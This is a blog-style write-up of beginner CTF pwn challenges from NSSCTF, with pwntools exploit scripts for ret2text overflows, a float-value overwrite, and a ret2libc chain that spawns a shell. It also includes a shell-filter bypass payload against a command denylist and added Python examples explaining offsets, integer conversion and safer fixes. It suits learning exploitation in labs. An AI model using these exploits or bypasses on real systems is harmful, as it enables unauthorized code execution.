NSSCTF PWN (Beginner)


    1 [SWPUCTF 2021 Freshman Contest] nc sign-in

    This is just picking on honest people~

    import os
    
    art = '''
    
       ((  "####@@!!$$    ))
           `#####@@!$$`  ))
        ((  '####@!!$:
       ((  ,####@!!$:   ))
           .###@!!$:
           `##@@!$:
            `#@!!$
      !@#    `#@!$:       @#$
       #$     `#@!$:       !@!
                '@!$:
            '`\   "!$: /`'
               '\  '!: /'
                 "\ : /"
      -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
    " -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
    print(art)
    print("My_shell_ProVersion")
    
    blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']
    
    while True:
        command = input()
        for i in blacklist:
            if i in command:
                exit(0)
        os.system(command)
    

    Payload: tac$IFS$1flag

    $IFS expands to the whitespace the denylist forbids, and the empty positional parameter $1 terminates the variable name so the shell does not look up a variable called IFSflag. The literal substring ${IFS} is blocked, but a bare $IFS is not.
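To see why `tac$IFS$1flag` reaches `os.system()` while `cat flag` and `tac${IFS}flag` do not, here is an added example (not part of the original writeup) that re-implements the challenge's substring denylist next to a simplified emulation of the shell's parameter expansion and field splitting. The emulation is an assumption, not a real shell: it models only `$IFS`, `${IFS}`, unset variables and empty positional parameters, and ignores quoting. The `safe_argv` function at the end is a hypothetical hardened replacement for `os.system` (parse with `shlex`, no shell, allowlisted program), not anything from the challenge.

```python
import re
import shlex

# The challenge's denylist, copied from the source above.
BLACKLIST = ['cat', 'ls', ' ', 'cd', 'echo', '<', '${IFS}']

# POSIX default value of IFS: space, tab, newline.
IFS_DEFAULT = " \t\n"

# Matches ${IFS}, a $NAME variable reference, or a positional parameter $1..$9.
_PARAM = re.compile(r'\$\{IFS\}|\$([A-Za-z_][A-Za-z0-9_]*)|\$([1-9])')


def passes_filter(command: str) -> bool:
    """True when the substring denylist would let the command reach os.system()."""
    return not any(bad in command for bad in BLACKLIST)


def expand_and_split(command: str) -> list:
    """Simplified emulation (an assumption, not a real shell) of POSIX parameter
    expansion followed by field splitting. $IFS and ${IFS} expand to IFS_DEFAULT,
    every other variable is treated as unset, $1..$9 are empty, quoting is not
    modelled."""
    def substitute(match):
        if match.group(0) == '${IFS}' or match.group(1) == 'IFS':
            return IFS_DEFAULT
        return ''  # unset variable or empty positional parameter
    expanded = _PARAM.sub(substitute, command)
    # Field splitting: runs of IFS characters separate words; leading and
    # trailing IFS whitespace produces no empty field.
    return [word for word in re.split(r'[ \t\n]+', expanded) if word]


def analyse(command: str) -> dict:
    """What the denylist decides, and what argv the shell would build from it."""
    return {
        'passes_filter': passes_filter(command),
        'argv': expand_and_split(command),
    }


def safe_argv(command: str, allowlist) -> list:
    """Hypothetical hardened dispatcher: parse with shlex (no shell, so no
    parameter expansion ever happens) and accept only an allowlisted program.
    Returns the argv list, or None if the command is rejected."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    if not argv or argv[0] not in allowlist:
        return None
    return argv


if __name__ == '__main__':
    for cmd in ['cat flag', 'tac${IFS}flag', 'tac$IFSflag', 'tac$IFS$1flag']:
        print(f'{cmd!r:20} -> {analyse(cmd)}')
    print(safe_argv('tac$IFS$1flag', {'id', 'whoami'}))
```

Note that `tac$IFSflag` expands to just `tac`: the shell reads `IFSflag` as one variable name, which is exactly the problem `$1` solves. Under `safe_argv` the whole string `tac$IFS$1flag` is a single token that matches no allowlisted program, because without a shell there is no expansion step to abuse.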

    2 [SWPUCTF 2021 Freshman Contest] gift_pwn (solved)

    ret2text: overflow the 0x10-byte buffer and the 8-byte saved rbp, then return into the gift function at 0x4005B6.

    from pwn import *
    
    day3 = remote("1.14.71.254", 28339)
    # day3 = process("./ret2sys")
    gift = 0x4005B6
    
    payload = b'a' * (0x10 + 8) + p64(gift)
    
    day3.sendline(payload)
    day3.interactive()
    

    3 [CISCN 2019 North China] PWN1

    The overwrite here is a value, 0x41348000. It represents a floating-point number, which is a bit confusing.

    from pwn import *
    
    day3 = remote("1.14.71.254", 28907)
    # day3 = process("./PWN1")
    
    payload = b'a' * (0x30 - 4) + p32(0x41348000)
    day3.recvuntil("Let's guess the number.\n")
    
    day3.sendline(payload)
    day3.interactive()
    
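The constant is less mysterious once decoded: 0x41348000 is the IEEE-754 single-precision bit pattern of 11.28125 (sign 0, exponent 0x82 = 2^3, mantissa 0x348000 = 1.41015625, and 1.41015625 × 8 = 11.28125). The binary compares a float local against that value, and the local sits 0x30 - 4 bytes past the start of the overflowed buffer, so the exploit has to write the exact 4-byte pattern rather than the text "11.28125". The following added example (mine, not from the writeup; plain `struct` instead of pwntools) converts in both directions and rebuilds the same payload; the double-precision helper is there for targets that compare a `double` and therefore need 8 bytes.

```python
import struct


def f32_to_u32(value: float) -> int:
    """Bit pattern of value as an IEEE-754 single (little-endian, as on x86)."""
    return struct.unpack('<I', struct.pack('<f', value))[0]


def u32_to_f32(bits: int) -> float:
    """Inverse of f32_to_u32: interpret 32 bits as a single-precision float."""
    return struct.unpack('<f', struct.pack('<I', bits))[0]


def f64_to_u64(value: float) -> int:
    """Same idea for a double, in case the target compares 8 bytes instead."""
    return struct.unpack('<Q', struct.pack('<d', value))[0]


def is_exact_f32(value: float) -> bool:
    """True if value survives a round trip through single precision unchanged.
    If it does not, no 4-byte overwrite can make a float compare equal to it."""
    return u32_to_f32(f32_to_u32(value)) == value


def build_payload(buf_size: int, float_offset_from_end: int, target: float) -> bytes:
    """Pad from the start of the buffer up to the float local, then write the
    float's bit pattern. Mirrors b'a' * (0x30 - 4) + p32(0x41348000) above."""
    if not is_exact_f32(target):
        raise ValueError(f'{target} is not exactly representable as a float')
    padding = b'a' * (buf_size - float_offset_from_end)
    return padding + struct.pack('<I', f32_to_u32(target))


if __name__ == '__main__':
    print(hex(f32_to_u32(11.28125)))   # 0x41348000
    print(u32_to_f32(0x41348000))      # 11.28125
    print(hex(f64_to_u64(11.28125)))   # 0x4026900000000000
    print(build_payload(0x30, 4, 11.28125))
```

The `is_exact_f32` check matters when a challenge picks a constant like 0.1: a value that is not exactly representable in single precision is compared after rounding, so the bit pattern to write is the rounded one, and a payload built from the decimal literal without that round trip will not compare equal.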

    4 [SWPUCTF 2021 Freshman Contest] whitegive_pwn

    Garbage challenge; without the libc it can't be solved.

    from pwn import *
    from LibcSearcher import *
    io = remote('1.14.71.254', 28821)
    elf = ELF('./ret2libc')
    
    pop_rdi_ret = 0x0000000000400763
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    main = elf.symbols['main']
    
    payload1 = b'a' * 24 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
    io.sendline(payload1)
    puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
    print(hex(puts_addr))
    
    libc = LibcSearcher('puts', puts_addr)
    
    libc_base = puts_addr - libc.dump('puts')
    system = libc_base + libc.dump('system')
    bin_sh = libc_base + libc.dump('str_bin_sh')
    
    payload2 = b'a' * 24 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
    io.sendline(payload2)
    
    io.interactive()
    
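Without the remote's libc, the leaked `puts` address has to be matched against candidate builds, and a wrong candidate silently produces a bogus base and a crash instead of a shell. The added example below (mine, not from the writeup; plain `struct` instead of pwntools, and no network) decodes the 6-byte leak the way `u64(io.recv(6).ljust(8, b'\x00'))` does, filters candidate libcs by the low 12 bits of the leaked address (the property LibcSearcher matches on), checks that the resulting base is page-aligned before trusting it, and builds both ROP chains. The candidate offsets, the leak bytes and the gadget/PLT/GOT addresses used in the demo are constructed for illustration.

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack('<Q', value)


def u64(data: bytes) -> int:
    return struct.unpack('<Q', data)[0]


# Constructed candidate libcs: the offsets are illustrative, not a real database.
CANDIDATES = {
    'libc-A': {'puts': 0x80aa0, 'system': 0x4f550, 'str_bin_sh': 0x1b3e1a},
    'libc-B': {'puts': 0x6f690, 'system': 0x45390, 'str_bin_sh': 0x18cd57},
}


def parse_leak(raw: bytes) -> int:
    """A puts() leak of a userland x86-64 pointer is at most 6 non-zero bytes
    (the top two bytes are 0 and terminate the string). Pad back to 8 bytes."""
    if not 1 <= len(raw) <= 6:
        raise ValueError(f'unexpected leak length {len(raw)}')
    return u64(raw.ljust(8, b'\x00'))


def matching_candidates(leak: int, symbol: str, candidates: dict) -> list:
    """Only the low 12 bits of a symbol survive ASLR (libc is mapped page-aligned),
    so a candidate whose offset disagrees in those bits cannot be the remote libc."""
    return [name for name, offs in candidates.items()
            if offs[symbol] & 0xfff == leak & 0xfff]


def is_consistent(leak: int, offsets: dict) -> bool:
    """The base derived from a correct candidate is page-aligned; anything else
    means the offsets belong to a different build."""
    return (leak - offsets['puts']) & 0xfff == 0


def resolve(leak: int, offsets: dict) -> dict:
    """Compute base, system and "/bin/sh" from one candidate's offsets."""
    if not is_consistent(leak, offsets):
        raise ValueError('libc base not page aligned: wrong libc candidate')
    base = leak - offsets['puts']
    return {
        'base': base,
        'system': base + offsets['system'],
        'bin_sh': base + offsets['str_bin_sh'],
    }


def build_leak_chain(pad: int, pop_rdi: int, puts_got: int, puts_plt: int, main: int) -> bytes:
    """Stage 1: puts(puts@got), then return to main for a second overflow."""
    return b'a' * pad + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)


def build_system_chain(pad: int, pop_rdi: int, bin_sh: int, system: int,
                       ret_gadget=None) -> bytes:
    """Stage 2: system("/bin/sh"). An optional lone `ret` gadget re-aligns rsp to
    16 bytes before the call, which system() in newer glibc builds requires."""
    chain = b'a' * pad + p64(pop_rdi) + p64(bin_sh)
    if ret_gadget is not None:
        chain += p64(ret_gadget)
    return chain + p64(system)


if __name__ == '__main__':
    raw = b'\xa0\x7a\x5e\x34\x12\x7f'   # constructed 6-byte leak
    leak = parse_leak(raw)
    names = matching_candidates(leak, 'puts', CANDIDATES)
    addrs = resolve(leak, CANDIDATES[names[0]])
    print(hex(leak), names, {k: hex(v) for k, v in addrs.items()})
    print(build_system_chain(24, 0x400763, addrs['bin_sh'], addrs['system']).hex())
```

When several candidates survive the low-12-bit filter, the page-alignment check cannot separate them either; at that point the usual move is to leak a second symbol and keep only the candidate whose offsets explain both leaks. If the stage-2 chain reaches `system` and the process dies with a SIGSEGV inside libc, pass a `ret` gadget via `ret_gadget` to fix the stack alignment before suspecting the offsets.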

    5 [BJDCTF 2020] babystack2.0 (solved)

    from pwn import *
    day3 = remote("1.14.71.254",28058)
    # day3 = process("./pwn")
    
    day3.recvuntil("your name:\n")
    day3.sendline(b'-1')
    backdoor = 0x400726
    
    payload = b'a' * 0x18 + p64(backdoor)
    day3.sendline(payload)
    day3.interactive()
    

    6 [BJDCTF 2020] babystack

    from pwn import *
    day3 = remote("1.14.71.254",28582)
    # day3 = process("./pwn")
    
    day3.recvuntil("your name:\n")
    day3.sendline(b'100')
    backdoor = 0x4006E6
    
    payload = b'a' * 0x18 + p64(backdoor)
    day3.sendline(payload)
    day3.interactive()
    
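babystack2.0 is answered with `-1` as the name length where the original babystack takes `100`. The binary's exact length check is not reproduced on the page, but the `-1` trick is the classic signed-to-unsigned length confusion: a length parsed into a signed `int` passes a `<= limit` comparison, and is then converted to `read()`'s unsigned `size_t`, where -1 becomes 0xffffffffffffffff and the bounded read becomes an unbounded one. This added example (mine, not the challenge's code) emulates the two C integer conversions in Python and puts the flawed check beside a correct one; the limit of 10 and the 0x18-byte buffer used in the demo are assumptions.

```python
INT_BITS = 32
SIZE_T_BITS = 64


def to_int32(value: int) -> int:
    """Wrap an integer to a C `int` (two's complement, 32 bits)."""
    value &= (1 << INT_BITS) - 1
    return value - (1 << INT_BITS) if value >> (INT_BITS - 1) else value


def to_size_t(value: int) -> int:
    """Implicit conversion of a (possibly negative) int to C `size_t`."""
    return value & ((1 << SIZE_T_BITS) - 1)


def read_length_vulnerable(user_value: int, limit: int):
    """Flawed pattern, as in `int n; scanf("%d", &n); if (n > limit) reject;
    read(0, buf, n);`. Returns the count read() is actually asked for, or None
    when the input is rejected."""
    n = to_int32(user_value)
    if n > limit:          # signed compare: -1 > limit is false, so -1 gets through
        return None
    return to_size_t(n)    # read() takes size_t: -1 turns into SIZE_MAX


def read_length_fixed(user_value: int, limit: int):
    """Corrected pattern: reject anything outside 0 < n <= limit before the
    value ever reaches an unsigned parameter."""
    n = to_int32(user_value)
    if n <= 0 or n > limit:
        return None
    return to_size_t(n)


def is_unbounded(length, buf_size: int) -> bool:
    """Would read() be permitted to write past a buf_size-byte buffer?"""
    return length is not None and length > buf_size


if __name__ == '__main__':
    for v in (5, 100, -1):
        print(v, read_length_vulnerable(v, 10), read_length_fixed(v, 10))
```

The same confusion shows up with `unsigned int` lengths compared against a signed limit, and with `strtol`/`atoi` results stored in a `short`; the fix is always the same, compare in the signed domain with an explicit lower bound of zero (or parse into an unsigned type and bound it) before handing the value to `read`, `memcpy` or `malloc`.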

    7 [watevrCTF 2019] Voting Machine 1 (solved)

    from pwn import *
    day3 = remote("1.14.71.254",28784)
    # day3 = process("./Voting Machine")
    
    day3.recvuntil("Vote: ")
    backdoor = 0x400807
    
    payload = b'a' * (0x2 + 8) + p64(backdoor)
    day3.sendline(payload)
    day3.interactive()
    
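Every ret2text payload on this page (gift_pwn's 0x10 + 8, both babystack versions' 0x18, Voting Machine's 0x2 + 8) is "buffer size plus saved rbp" bytes of padding followed by the target address. The added example below (mine, not from the writeup) shows how that padding is measured when the buffer size is not obvious from the disassembly: generate a de Bruijn pattern (the same sequence pwntools' `cyclic` produces, so offsets agree with `cyclic_find`), feed it to the program, and look up the bytes that reached the return slot. Since there is no binary here, a small frame model stands in for the crash; the frame layouts in the demo are the ones the page's payloads imply.

```python
ALPHABET = b'abcdefghijklmnopqrstuvwxyz'
ORDER = 4            # any 4 consecutive pattern bytes are unique within the sequence
_PATTERN_CACHE = None


def de_bruijn(alphabet: bytes = ALPHABET, n: int = ORDER) -> bytes:
    """FKM construction of the de Bruijn sequence B(k, n). With the defaults this is
    byte-for-byte the sequence pwntools' cyclic() uses, so offsets agree with it."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def _pattern() -> bytes:
    global _PATTERN_CACHE
    if _PATTERN_CACHE is None:
        _PATTERN_CACHE = de_bruijn()   # 26**4 bytes, computed once
    return _PATTERN_CACHE


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern: what you would send as the probe."""
    return _pattern()[:length]


def cyclic_find(fragment: bytes) -> int:
    """Offset of the first ORDER bytes of `fragment` in the pattern, or -1."""
    return _pattern().find(fragment[:ORDER])


def simulate_crash(buf_size: int, payload: bytes, saved_rbp: int = 8) -> bytes:
    """Stand-in for the real crash. Frame model: [buf][saved rbp][return address].
    Returns the 8 payload bytes that land in the return-address slot. On a real
    x86-64 target the non-canonical address faults inside `ret`, so in a debugger
    you read these bytes at RSP rather than out of RIP."""
    slot = buf_size + saved_rbp
    return payload[slot:slot + 8]


def find_ret_offset(buf_size: int, probe_len: int = 200) -> int:
    """Send a cyclic probe, take what reached the return slot, look it up."""
    return cyclic_find(simulate_crash(buf_size, cyclic(probe_len)))


def build_ret2text(ret_offset: int, target: int) -> bytes:
    """Padding up to the return slot, then the little-endian 8-byte target."""
    return b'a' * ret_offset + target.to_bytes(8, 'little')


if __name__ == '__main__':
    for name, buf in (('gift_pwn', 0x10), ('babystack', 0x10), ('Voting Machine 1', 0x2)):
        print(f'{name}: return address at offset {find_ret_offset(buf)}')
    print(build_ret2text(find_ret_offset(0x10), 0x4005B6).hex())
```

Two practical caveats the model glosses over: if the program reads with `gets`/`scanf("%s")`, a pattern byte of 0x0a or 0x00 would end the input early, which is why the lowercase alphabet is used; and if a `strlen`-style copy sits between the read and the overflow, the first offset you measure is where the copy stops, not where the return address is.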

    Did a few more easy problems..

  Original article: https://blog.csdn.net/weixin_61823031/article/details/126917584